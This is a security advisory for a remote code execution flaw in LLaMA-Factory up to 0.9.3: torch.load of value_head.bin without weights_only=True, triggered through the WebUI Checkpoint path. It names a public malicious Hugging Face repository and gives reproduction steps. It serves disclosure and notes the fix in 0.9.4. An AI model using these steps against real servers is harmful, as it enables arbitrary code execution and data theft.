Описание
LLaMA-Factory allows Code Injection through improper vhead_file safeguards
Summary
A critical remote code execution vulnerability was discovered during the Llama Factory training process. This vulnerability arises because the vhead_file is loaded without proper safeguards, allowing malicious attackers to execute arbitrary malicious code on the host system simply by passing a malicious Checkpoint path parameter through the WebUI interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the vhead_file argument is loaded without the secure parameter weights_only=True.
Note: In torch versions <2.6, the default setting is weights_only=False, and Llama Factory's setup.py only requires torch>=2.0.0.
Affected Version
Llama Factory versions <=0.9.3 are affected by this vulnerability.
Details
-
In LLaMA Factory's WebUI, when a user sets the
Checkpoint path, it modifies theadapter_name_or_pathparameter passed to the training process. code in src/llamafactory/webui/runner.py -
The
adapter_name_or_pathpassed to the training process is then used insrc/llamafactory/model/model_utils/valuehead.pyto fetch the correspondingvalue_head.binfile from Hugging Face. This file is subsequently loaded viatorch.load()without the security parameterweights_only=Truebeing set, resulting in remote code execution. code in src/llamafactory/model/model_utils/valuehead.py
PoC
Steps to Reproduce
- Deploy llama factory.
- Remote attack through the WebUI interface
- Configure
Model nameandModel pathcorrectly. For demonstration purposes, we'll use a small modelllamafactory/tiny-random-Llama-3to accelerate model loading. - Set
Finetuning methodtoLoRAandTrain StagetoReward Modeling. The vulnerability is specifically triggered during the Reward Modeling training stage. - Input a malicious Hugging Face path in
Checkpoint path– here we usepaulinsider/llamafactory-hack. This repository(https://huggingface.co/paulinsider/llamafactory-hack/tree/main ) contains a maliciousvalue_head.binfile. The generation method for this file is as follows (it can execute arbitrary attack commands; for demonstration, we configured it to create aHACKED!folder). - Click
Startto begin training. After a brief wait, aHACKED!folder will be created on the server. Note that arbitrary malicious code could be executed through this method.
- Configure
The video demonstration of the vulnerability exploitation is available at the Google Drive Link
Impact
Exploitation of this vulnerability allows remote attackers to:
- Execute arbitrary malicious code / OS commands on the server.
- Potentially compromise sensitive data or escalate privileges.
- Deploy malware or create persistent backdoors in the system. This significantly increases the risk of data breaches and operational disruption.
Пакеты
llamafactory
<= 0.9.3
Отсутствует
Связанные уязвимости
LLaMA-Factory is a tuning library for large language models. A remote code execution vulnerability was discovered in LLaMA-Factory versions up to and including 0.9.3 during the LLaMA-Factory training process. This vulnerability arises because the `vhead_file` is loaded without proper safeguards, allowing malicious attackers to execute arbitrary malicious code on the host system simply by passing a malicious `Checkpoint path` parameter through the `WebUI` interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the `vhead_file` argument is loaded without the secure parameter `weights_only=True`. Version 0.9.4 contains a fix for the issue.